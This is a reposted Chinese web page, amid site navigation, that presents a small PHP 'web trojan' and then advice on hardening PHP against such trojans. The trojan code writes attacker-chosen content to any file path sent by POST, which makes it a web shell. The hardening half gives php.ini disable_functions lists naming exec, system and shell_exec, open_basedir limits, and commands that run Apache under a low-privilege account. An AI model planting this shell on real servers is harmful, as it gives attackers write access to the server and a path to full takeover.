实用工具
小学数学练习
字帖生成
在线画板
函数绘制
拼音字母表
在线词典
黄历查询
中国历史
Excel函数
模拟请求
json格式化
最新更新
全站导航
登陆/注册
原创投稿
知识解答
合同文书
教育问答
最新资讯
学术期刊
资料下载
高考报名时间
2022年11月1日
还剩
天
距离
2023年6月7日
高考还有
天
网站首页
小学
初中
高中
语言
会计
驾考
学历
司法
IT
医护
建筑
作文
栏目分类:
前沿技术
软件开发
系统运维
产品运营
生活办公
面试经验
考试题库
子分类:
人工智能
大数据
云计算
区块链
物联网
深度学习
机器学习
NLP
计算机视觉
语音识别
其他
大数据系统
数据可视化
数据挖掘与分析
其他
Docker/k8s
虚拟化
云平台
其他
基本原理
数字货币
智能合约
EOS应用
其他
通讯技术
嵌入式开发
单片机
物联网应用
HarmonyOS
其他
后端开发
Web开发
移动开发
游戏开发
Python
Java
架构设计
C/C++/C#
PHP
.Net
Go语言
R语言
asp
Html/CSS
易语言
JavaScript
汇编语言
Vue.js
React.JS
Ruby开发
快速导航
当前搜索
当前分类
前沿技术
软件开发
系统运维
产品运营
生活办公
面试经验
考试题库
子分类
人工智能
大数据
云计算
区块链
物联网
深度学习
机器学习
NLP
计算机视觉
语音识别
其他
大数据系统
数据可视化
数据挖掘与分析
其他
Docker/k8s
虚拟化
云平台
其他
基本原理
数字货币
智能合约
EOS应用
其他
通讯技术
嵌入式开发
单片机
物联网应用
HarmonyOS
其他
后端开发
Web开发
移动开发
游戏开发
Python
Java
架构设计
C/C++/C#
PHP
.Net
Go语言
R语言
实用工具
学习工具
小学数学练习
字帖生成
在线画板
函数绘制
拼音字母表
在线词典
黄历查询
亲戚关系计算
安全期计算
中国历史
Excel函数
模拟请求
json格式化
浏览器指纹
热门搜索
路由器设置
木托盘
宝塔面板
儿童python教程
心情低落
朋友圈
vim
双一流学科
专升本
我的学校
日记学校
西点培训学校
汽修学校
情书
化妆学校
塔沟武校
异形模板
西南大学排名
最精辟人生短句
6步教你追回被骗的钱
南昌大学排名
清朝十二帝
北京印刷学院排名
北方工业大学排名
北京航空航天大学排名
首都经济贸易大学排名
中国传媒大学排名
首都师范大学排名
中国地质大学(北京)排名
北京信息科技大学排名
名师互学网
>
IT
>
软件开发
>
后端开发
>
PHP
全世界最小的php网页木马一枚 附PHP木马的防范方法
PHP
更新时间:
2026-04-01 03:24:19
发布时间:
1855天前
IT归档
最新发布
模块sitemap
名妆网
法律咨询
聚返吧
英语巴士网
伯小乐
网商动力
朗读
php网页木马
复制代码
代码如下:
header("content-Type: text/html; charset=gb2312");
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
?>
保存文件名:
if(isset($_POST['file']))
{
$fp = @fopen($_POST['file'],'wb');
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!';
@fclose($fp);
}
?>
一句话php木马
复制代码
代码如下:
PHP木马的防范方法
PHP是能让你生成动态网页的工具之一。PHP网页文件被当作一般HTML网页文件来处理并且在编辑时你可以用编辑HTML的常规方法编写PHP。
PHP代表,超文本预处理器(PHP: Hypertext Preprocessor),可以从PHP官方站点(http://www.php.net)自由下载。PHP遵守GNU公共许可(GPL),在这一许可下诞生了许多流行的软件诸如Linux和Emacs。PHP在大多数Unix平台,GUN/Linux和微软Windows平台上均可以运行。怎样在Windows环境的PC机器或Unix机器上安装PHP的资料可以在PHP官方站点上找到。安装过程很简单。
PHP的另一好处就在于他的安全性,随着现在互联网的发展,网络安全越来越受重视,PHP的诞生几乎代替了ASP,因为PHP对于安全方面的设置是极为简单的不像ASP那样需要很多的步骤,和禁用很多的服务。不过再好的东西也始终会有不足,如果默认设置的PHP同意也是不堪一击,因此本文就来讲一下如何对PHP进行一些安全方面的配置,来防止脚本木马的破坏。
一、防止php木马执行webshell
打开safe_mode, 在,php.ini中设置 disable_functions= passthru,exec,shell_exec,system 二者选一即可,也可都选。
二、防止跳出web目录
首先修改httpd.conf,如果你只允许你的php脚本程序在web目录里操作,还可以修改httpd.conf文件限制php的操作路径。比如你的web目录是/usr/local/apache/htdocs,那么在httpd.conf里加上这么几行: php_admin_value open_basedir /usr/local/apache/htdocs ,如果脚本要读取/usr/local/apache/htdocs以外的文件将不会被允许,如果错误显示打开的话会提示这样的错误: Warning: open_basedir restriction in effect. File is in wrong directory in /usr/local/apache/htdocs/open.php on line 4 等等。
三、防止php木马读写文件目录
在php.ini中的 disable_functions= passthru,exec,shell_exec,system 后面加上php处理文件的函数,主要有 fopen,mkdir,rmdir,chmod,unlink,dir,fopen,fread,fclose,fwrite,file_exists,closedir,is_dir,readdir.opendir,fileperms.copy,unlink,delfile 。即成为 disable_functions= passthru,exec,shell_exec,system,fopen,mkdir,rmdir,chmod,unlink,dir ,fopen,fread,fclose,fwrite,file_exists ,closedir,is_dir,readdir.opendir ,fileperms.copy,unlink,delfile 。
ok,大功告成,php木马拿我们没辙了,遗憾的是这样的话,利用文本数据库的那些东西就都不能用了。 如果是在windos平台下搭建的apache还需要注意一点,apache默认运行是system权限,必须给apache降降权限,如下:
net user apache f**kmicrosoft /add
net localgroup users apache /del
此时建立了一个不属于任何组的用户apche,只要打开计算机管理器-服务-apache服务的属性-log on-this account,在这里填入上面所建立的账户和密码,重启apache服务即可实现apache运行在低权限下。
总结:实际上还可以通过设置各个文件夹的权限,给每一个目录建立一个单独能读写的用户,来实现安全。当前很多虚拟主机提供商的流行配置方法,不过这种方法用于防止这里就显的有点大材小用了。只要我们管理员有安全意识,相对的禁闭不用的功能就可以保证网络安全的威胁。
下面是mcafee的安全设置,防止一些网页木马生成文件等。
https://www.jb51.net/hack/list461_1.html
转载请注明:
文章转载自
www.mshxw.com
本文地址:
https://www.mshxw.com/it/52551.html
上一篇 PHP 日期加减的类,很不错
下一篇 php 数学运算验证码实现代码
PHP相关栏目本月热门文章
1
【Linux驱动开发】设备树详解(二)设备树语法详解
2
别跟客户扯细节
3
Springboot+RabbitMQ+ACK机制(生产方确认(全局、局部)、消费方确认)、知识盲区
4
【Java】对象处理流(ObjectOutputStream和ObjectInputStream)
5
【分页】常见两种SpringBoot项目中分页技巧
6
一文带你搞懂OAuth2.0
7
我要写整个中文互联网界最牛逼的JVM系列教程 | 「JVM与Java体系架构」章节:虚拟机与Java虚拟机介绍
8
【Spring Cloud】新闻头条微服务项目:FreeMarker模板引擎实现文章静态页面生成
9
JavaSE - 封装、static成员和内部类
10
树莓派mjpg-streamer实现监控及拍照功能调试
11
用c++写一个蓝屏代码
12
从JDK8源码中看ArrayList和LinkedList的区别
13
idea 1、报错java: 找不到符号 符号: 变量 log 2、转换成Maven项目
14
在openwrt使用C语言增加ubus接口(包含C uci操作)
15
Spring 解决循环依赖
16
SpringMVC——基于MVC架构的Spring框架
17
Andy‘s First Dictionary C++ STL set应用
18
动态内存管理
19
我的创作纪念日
20
Docker自定义镜像-Dockerfile
热门相关搜索
路由器设置
木托盘
宝塔面板
儿童python教程
心情低落
朋友圈
vim
双一流学科
专升本
我的学校
日记学校
西点培训学校
汽修学校
情书
化妆学校
塔沟武校
异形模板
西南大学排名
最精辟人生短句
6步教你追回被骗的钱
南昌大学排名
清朝十二帝
北京印刷学院排名
北方工业大学排名
北京航空航天大学排名
首都经济贸易大学排名
中国传媒大学排名
首都师范大学排名
中国地质大学(北京)排名
北京信息科技大学排名
中央民族大学排名
北京舞蹈学院排名
北京电影学院排名
中国戏曲学院排名
河北政法职业学院排名
河北经贸大学排名
天津中德应用技术大学排名
天津医学高等专科学校排名
天津美术学院排名
天津音乐学院排名
天津工业大学排名
北京工业大学耿丹学院排名
北京警察学院排名
天津科技大学排名
北京邮电大学(宏福校区)排名
北京网络职业学院排名
北京大学医学部排名
河北科技大学排名
河北地质大学排名
河北体育学院排名
关于我们
文章归档
网站地图
联系我们
版权所有 (c)2021-2022 MSHXW.COM
ICP备案号:
晋ICP备2021003244-6号